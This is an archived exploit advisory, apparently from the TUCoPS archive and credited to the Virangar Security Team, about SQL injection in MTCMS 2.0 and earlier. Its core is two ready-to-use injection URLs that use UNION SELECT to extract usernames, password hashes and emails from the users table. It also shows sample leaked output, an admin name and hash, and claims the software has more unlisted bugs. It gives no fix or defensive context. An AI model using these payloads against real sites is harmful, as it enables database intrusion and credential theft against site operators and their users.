TUCoPS :: Web :: CMS / Portals :: bx1373.htm

MTCMS <=2.0 SQL Injection Vulnerbility
MTCMS <=2.0 SQL Injection Vulnerbility
MTCMS <=2.0 SQL Injection Vulnerbility



            =0D
			 ########################################################################=0D
             #                                                                      #=0D
             #    ...:::::MTCMS <=2.0  SQL Injection Vulnerbility ::::....           #           =0D
             ########################################################################=0D
=0D
Virangar Security Team=0D
=0D
www.virangar.org=0D 
www.virangar.net=0D 
=0D
--------=0D
Discoverd By :hadihadi=0D
=0D
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra=0D
=0D
& all virangar members & all hackerz=0D
=0D
greetz:to my best friend in the world hadi_aryaie2004=0D
----------=0D
vules:=0D
http://site.com/patch/?a='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*=0D 
http://site.com/patch/?a=downloads&cid='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*=0D 
=0D
-------------------------------------=0D
you can see somting such as:=0D
#admin_35a6e23edefc651ef0380b277ce5d709#=0D
Admin@service.com=0D 
-------------------------------------=0D
MTCMS contains of other bugs in other pages ;)=0D
& maybe other versions have Vulnerbility too :)

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH